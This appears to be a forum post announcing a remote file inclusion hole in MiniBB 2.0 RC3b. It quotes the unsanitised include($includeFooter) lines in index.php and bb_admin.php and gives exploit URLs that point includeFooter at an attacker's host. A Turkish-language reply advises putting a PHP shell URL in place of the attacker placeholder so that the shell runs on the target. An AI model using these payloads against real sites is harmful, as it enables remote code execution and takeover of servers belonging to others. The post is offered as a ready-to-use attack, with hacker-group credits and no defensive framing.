MiniBB <= Include File

[Phara0h]

MiniBB 2.0 RC3b ( last version release ) Software has a remote file
inclusion founded by
V4mu from Anomaly 1n The System
 
vendor: [url]http://www.minibb.net[/url]
 
the bug is in index.php line 306:
 
if(isset($includeFooter)) include($includeFooter); else echo
ParseTpl(makeUp('main_footer'));
 
and in bb_admin.php line 712:
 
if(isset($includeFooter)) include($includeFooter); else echo
ParseTpl(makeUp('main_footer'));
 
Exploit:
 
[url]www.target.com/[/url][path_to_minibb]/index.php?includeFooter=http://[attacker]
 
and
 
[url]www.target.com/[/url][path_to_minibb]/bb_admin.php?includeFooter=http://[attacker]
 
------------------------------------------------------------------------------------------------------------------------
 
[A]nomaly [1]n [T]he [S]ystem
 
We are: 
 
V4mu <*> S0l4r1s <*> r3ckd4ll <*> paulinhu <*> nicked <*> Creative_MX
<*> Einst3in <*> magic

 

[wh0ppix]

manual kullanım için
minibb dizininde/index.php?includeFooter=http://[attacker]

attacker yerine phpshell yazın include etsin